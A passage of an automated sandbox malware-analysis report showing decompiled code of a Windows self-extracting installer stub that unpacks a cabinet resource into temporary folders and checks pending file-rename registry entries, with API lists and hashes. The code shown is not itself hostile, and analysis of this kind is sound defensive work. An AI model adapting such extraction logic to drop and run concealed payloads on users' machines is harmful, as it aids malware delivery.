						E00BC44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0xbc1140, 0, E00BC4CD0, 0, 0xbc9140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0xbc8584; // 0x0
					E00BC44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0xbc9140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0xbc9140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0xbc91d8; // 0x0
						if(_t47 == 0) {
							E00BC44B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0xbc8a38 & 0x00000001) == 0 && ( *0xbc9a34 & 0x00000001) == 0) {
						SendMessageA( *0xbc8584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}
















                                                                                                                                                                                                        0x00bc4fe0
                                                                                                                                                                                                        0x00bc4fe6
                                                                                                                                                                                                        0x00bc4ff9
                                                                                                                                                                                                        0x00bc500d
                                                                                                                                                                                                        0x00bc5013
                                                                                                                                                                                                        0x00bc501a
                                                                                                                                                                                                        0x00bc5163
                                                                                                                                                                                                        0x00bc5163
                                                                                                                                                                                                        0x00bc5020
                                                                                                                                                                                                        0x00bc5027
                                                                                                                                                                                                        0x00bc5037
                                                                                                                                                                                                        0x00bc5051
                                                                                                                                                                                                        0x00bc5051
                                                                                                                                                                                                        0x00bc5057
                                                                                                                                                                                                        0x00bc505e
                                                                                                                                                                                                        0x00bc50a7
                                                                                                                                                                                                        0x00bc50ad
                                                                                                                                                                                                        0x00bc50b4
                                                                                                                                                                                                        0x00bc50e8
                                                                                                                                                                                                        0x00bc50e8
                                                                                                                                                                                                        0x00bc50ee
                                                                                                                                                                                                        0x00bc50ff
                                                                                                                                                                                                        0x00bc5104
                                                                                                                                                                                                        0x00bc5106
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5106
                                                                                                                                                                                                        0x00bc50cd
                                                                                                                                                                                                        0x00bc50d3
                                                                                                                                                                                                        0x00bc50da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc50dd
                                                                                                                                                                                                        0x00bc50e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5060
                                                                                                                                                                                                        0x00bc5060
                                                                                                                                                                                                        0x00bc5070
                                                                                                                                                                                                        0x00bc5075
                                                                                                                                                                                                        0x00bc5107
                                                                                                                                                                                                        0x00bc5107
                                                                                                                                                                                                        0x00bc510e
                                                                                                                                                                                                        0x00bc5111
                                                                                                                                                                                                        0x00bc5117
                                                                                                                                                                                                        0x00bc5117
                                                                                                                                                                                                        0x00bc511f
                                                                                                                                                                                                        0x00bc5121
                                                                                                                                                                                                        0x00bc5127
                                                                                                                                                                                                        0x00bc5135
                                                                                                                                                                                                        0x00bc5135
                                                                                                                                                                                                        0x00bc5127
                                                                                                                                                                                                        0x00bc5141
                                                                                                                                                                                                        0x00bc5159
                                                                                                                                                                                                        0x00bc5159
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc515f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                          • Part of subcall function 00BC468F: SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00BC4FFE
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00BC5006
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00BC500D
                                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 00BC5030
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00BC5037
                                                                                                                                                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 00BC504A
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00BC5051
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00BC5111
                                                                                                                                                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00BC5159
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                                                                                                                        • Opcode ID: 3febf5ca6895a3546adbf50ad5d178f692abd3ecb0dffaad76e96c7477718ad1
                                                                                                                                                                                                        • Instruction ID: 11914bdb3826713bb3595840f690ec2b970028f06626dc3efb3c91bb63fcd739
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3febf5ca6895a3546adbf50ad5d178f692abd3ecb0dffaad76e96c7477718ad1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF31A5B16407157FE7205B65AD9EF673AECE74CB99F0800ACF901B32A1DFB49C408665
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71fileCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00BC53A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E00BC171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00BC1680(_t32, 0x104, _t20);
					E00BC658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00BC6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0xbc8a20 = 1;
				goto L5;
			}

















                                                                                                                                                                                                        0x00bc53ac
                                                                                                                                                                                                        0x00bc53b3
                                                                                                                                                                                                        0x00bc53b9
                                                                                                                                                                                                        0x00bc53bb
                                                                                                                                                                                                        0x00bc53bd
                                                                                                                                                                                                        0x00bc53bf
                                                                                                                                                                                                        0x00bc53d1
                                                                                                                                                                                                        0x00bc53d6
                                                                                                                                                                                                        0x00bc53e0
                                                                                                                                                                                                        0x00bc53e2
                                                                                                                                                                                                        0x00bc53f5
                                                                                                                                                                                                        0x00bc53fb
                                                                                                                                                                                                        0x00bc5402
                                                                                                                                                                                                        0x00bc540b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5413
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5415
                                                                                                                                                                                                        0x00bc5416
                                                                                                                                                                                                        0x00bc5427
                                                                                                                                                                                                        0x00bc542a
                                                                                                                                                                                                        0x00bc542b
                                                                                                                                                                                                        0x00bc5434
                                                                                                                                                                                                        0x00bc5434
                                                                                                                                                                                                        0x00bc543a
                                                                                                                                                                                                        0x00bc544c
                                                                                                                                                                                                        0x00bc544c
                                                                                                                                                                                                        0x00bc5452
                                                                                                                                                                                                        0x00bc545a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc545e
                                                                                                                                                                                                        0x00bc545f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC171E: _vsnprintf.MSVCRT ref: 00BC1750
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC53FB
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC5402
                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC541F
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC542B
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC5434
                                                                                                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC5452
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                        • API String ID: 1082909758-3361814588
                                                                                                                                                                                                        • Opcode ID: a363110bf87abc4f93638cfe5ba56e570b21730a9a45f31bfeed80270185e7ef
                                                                                                                                                                                                        • Instruction ID: 854f8535718fbdad2c4e5005214c75e2021f31f5f979543c144b1110884b86c1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a363110bf87abc4f93638cfe5ba56e570b21730a9a45f31bfeed80270185e7ef
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F11277130050877D3249B369C49FAF37ADEFCA315F0000ADF546D3291CE749D8286A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 478 bc5467-bc5484 479 bc551c-bc5528 call bc1680 478->479 480 bc548a-bc5490 call bc53a1 478->480 484 bc552d-bc5539 call bc58c8 479->484 483 bc5495-bc5497 480->483 485 bc549d-bc54c0 call bc1781 483->485 486 bc5581-bc5583 483->486 493 bc554d-bc5552 484->493 494 bc553b-bc5545 CreateDirectoryA 484->494 499 bc550c-bc551a call bc658a 485->499 500 bc54c2-bc54d8 GetSystemInfo 485->500 489 bc558d-bc559d call bc6ce0 486->489 497 bc5554-bc5557 call bc597d 493->497 498 bc5585-bc558b 493->498 495 bc5577-bc557c call bc6285 494->495 496 bc5547 494->496 495->486 496->493 507 bc555c-bc555e 497->507 498->489 499->484 505 bc54fe 500->505 506 bc54da-bc54dd 500->506 508 bc5503-bc5507 call bc658a 505->508 511 bc54df-bc54e2 506->511 512 bc54f7-bc54fc 506->512 507->498 515 bc5560-bc5566 507->515 508->499 513 bc54e4-bc54e7 511->513 514 bc54f0-bc54f5 511->514 512->508 513->499 517 bc54e9-bc54ee 513->517 514->508 515->486 518 bc5568-bc5575 RemoveDirectoryA 515->518 517->508 518->486
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00BC5467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0xbc91e4;
					_t42 = 0x104;
					E00BC1680(0xbc91e4, 0x104);
					L14:
					_t13 = E00BC58C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0xbc9124 = 0;
							_t14 = 1;
							L24:
							return E00BC6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E00BC597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0xbc8a20; // 0x0
						if(_t61 != 0) {
							 *0xbc8a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0xbc9124 = E00BC6285();
						goto L22;
					}
					 *0xbc8a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E00BC53A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0xbc91e4;
				E00BC1781(0xbc91e4, 0x104, __ecx,  &_v268);
				if(( *0xbc9a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E00BC658A(_t48, 0x104, 0xbc1140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E00BC658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}




















                                                                                                                                                                                                        0x00bc5472
                                                                                                                                                                                                        0x00bc5479
                                                                                                                                                                                                        0x00bc5481
                                                                                                                                                                                                        0x00bc5484
                                                                                                                                                                                                        0x00bc551c
                                                                                                                                                                                                        0x00bc5521
                                                                                                                                                                                                        0x00bc5528
                                                                                                                                                                                                        0x00bc552d
                                                                                                                                                                                                        0x00bc552f
                                                                                                                                                                                                        0x00bc5539
                                                                                                                                                                                                        0x00bc554d
                                                                                                                                                                                                        0x00bc554d
                                                                                                                                                                                                        0x00bc5552
                                                                                                                                                                                                        0x00bc5585
                                                                                                                                                                                                        0x00bc5585
                                                                                                                                                                                                        0x00bc558b
                                                                                                                                                                                                        0x00bc558d
                                                                                                                                                                                                        0x00bc559d
                                                                                                                                                                                                        0x00bc559d
                                                                                                                                                                                                        0x00bc5557
                                                                                                                                                                                                        0x00bc555e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5560
                                                                                                                                                                                                        0x00bc5566
                                                                                                                                                                                                        0x00bc5569
                                                                                                                                                                                                        0x00bc556f
                                                                                                                                                                                                        0x00bc556f
                                                                                                                                                                                                        0x00bc5581
                                                                                                                                                                                                        0x00bc5581
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5581
                                                                                                                                                                                                        0x00bc5545
                                                                                                                                                                                                        0x00bc557c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc557c
                                                                                                                                                                                                        0x00bc5547
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5547
                                                                                                                                                                                                        0x00bc548a
                                                                                                                                                                                                        0x00bc5490
                                                                                                                                                                                                        0x00bc5497
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc549d
                                                                                                                                                                                                        0x00bc54ab
                                                                                                                                                                                                        0x00bc54b4
                                                                                                                                                                                                        0x00bc54c0
                                                                                                                                                                                                        0x00bc550c
                                                                                                                                                                                                        0x00bc5511
                                                                                                                                                                                                        0x00bc5515
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5515
                                                                                                                                                                                                        0x00bc54c9
                                                                                                                                                                                                        0x00bc54d6
                                                                                                                                                                                                        0x00bc54d8
                                                                                                                                                                                                        0x00bc54fe
                                                                                                                                                                                                        0x00bc5503
                                                                                                                                                                                                        0x00bc5507
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5507
                                                                                                                                                                                                        0x00bc54da
                                                                                                                                                                                                        0x00bc54dd
                                                                                                                                                                                                        0x00bc54f7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc54f7
                                                                                                                                                                                                        0x00bc54df
                                                                                                                                                                                                        0x00bc54e2
                                                                                                                                                                                                        0x00bc54f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc54f0
                                                                                                                                                                                                        0x00bc54e7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc54e9
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC54C9
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC553D
                                                                                                                                                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC556F
                                                                                                                                                                                                          • Part of subcall function 00BC53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC53FB
                                                                                                                                                                                                          • Part of subcall function 00BC53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC5402
                                                                                                                                                                                                          • Part of subcall function 00BC53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC541F
                                                                                                                                                                                                          • Part of subcall function 00BC53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC542B
                                                                                                                                                                                                          • Part of subcall function 00BC53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC5434
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                        • API String ID: 1979080616-510557316
                                                                                                                                                                                                        • Opcode ID: e22fd5453833591d113517a737247e68da5ea3a8ede2a1130d8df05393338494
                                                                                                                                                                                                        • Instruction ID: b2017bc9700f6cfbd7e9c5ee23973662128dd85ef14d38b1b28595dbd78a198d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e22fd5453833591d113517a737247e68da5ea3a8ede2a1130d8df05393338494
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D310A71700A046BDB305F299C45F7E77DAEBE5344B1401EEA405E3151DF70EE8186A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 519 bc256d-bc257d 520 bc2622-bc2627 call bc24e0 519->520 521 bc2583-bc2589 519->521 528 bc2629-bc262f 520->528 523 bc25e8-bc2607 RegOpenKeyExA 521->523 524 bc258b 521->524 525 bc2609-bc2620 RegQueryInfoKeyA 523->525 526 bc25e3-bc25e6 523->526 524->528 529 bc2591-bc2595 524->529 530 bc25d1-bc25dd RegCloseKey 525->530 526->528 529->528 531 bc259b-bc25ba RegOpenKeyExA 529->531 530->526 531->526 532 bc25bc-bc25cb RegQueryValueExA 531->532 532->530
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00BC256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E00BC24E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}











                                                                                                                                                                                                        0x00bc2572
                                                                                                                                                                                                        0x00bc2573
                                                                                                                                                                                                        0x00bc2575
                                                                                                                                                                                                        0x00bc2578
                                                                                                                                                                                                        0x00bc257d
                                                                                                                                                                                                        0x00bc2627
                                                                                                                                                                                                        0x00bc2583
                                                                                                                                                                                                        0x00bc2586
                                                                                                                                                                                                        0x00bc2589
                                                                                                                                                                                                        0x00bc25eb
                                                                                                                                                                                                        0x00bc2607
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2609
                                                                                                                                                                                                        0x00bc261a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc261a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc258b
                                                                                                                                                                                                        0x00bc258b
                                                                                                                                                                                                        0x00bc259e
                                                                                                                                                                                                        0x00bc25b2
                                                                                                                                                                                                        0x00bc25ba
                                                                                                                                                                                                        0x00bc25cb
                                                                                                                                                                                                        0x00bc25d1
                                                                                                                                                                                                        0x00bc25d6
                                                                                                                                                                                                        0x00bc25da
                                                                                                                                                                                                        0x00bc25dd
                                                                                                                                                                                                        0x00bc25dd
                                                                                                                                                                                                        0x00bc25e3
                                                                                                                                                                                                        0x00bc25e3
                                                                                                                                                                                                        0x00bc25e3
                                                                                                                                                                                                        0x00bc258b
                                                                                                                                                                                                        0x00bc2589
                                                                                                                                                                                                        0x00bc262f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00BC4096,00BC4096,?,00BC1ED3,00000001,00000000,?,?,00BC4137,?), ref: 00BC25B2
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00BC4096,?,00BC1ED3,00000001,00000000,?,?,00BC4137,?,00BC4096), ref: 00BC25CB
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,00BC1ED3,00000001,00000000,?,?,00BC4137,?,00BC4096), ref: 00BC25DD
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00BC4096,00BC4096,?,00BC1ED3,00000001,00000000,?,?,00BC4137,?), ref: 00BC25FF
                                                                                                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00BC4096,00000000,00000000,00000000,00000000,?,00BC1ED3,00000001,00000000), ref: 00BC261A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • PendingFileRenameOperations, xrefs: 00BC25C3
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 00BC25A8
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00BC25F5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
